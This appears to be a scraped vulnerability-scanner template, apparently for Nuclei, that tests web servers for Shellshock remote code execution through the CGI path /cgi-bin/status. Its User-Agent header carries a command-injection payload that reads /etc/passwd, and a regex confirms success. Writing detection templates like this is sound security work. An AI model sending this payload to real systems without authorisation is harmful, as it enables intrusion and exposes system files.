19 lines
332 B
YAML
19 lines
332 B
YAML
id: rce-user-agent-shell-shock
|
|
|
|
info:
|
|
name: Remote Code Execution Via (User-Agent)
|
|
author: 0xelkomy
|
|
severity: high
|
|
|
|
requests:
|
|
- method: GET
|
|
headers:
|
|
User-Agent: "{ :;}; echo $(</etc/passwd)"
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/status"
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
part: body
|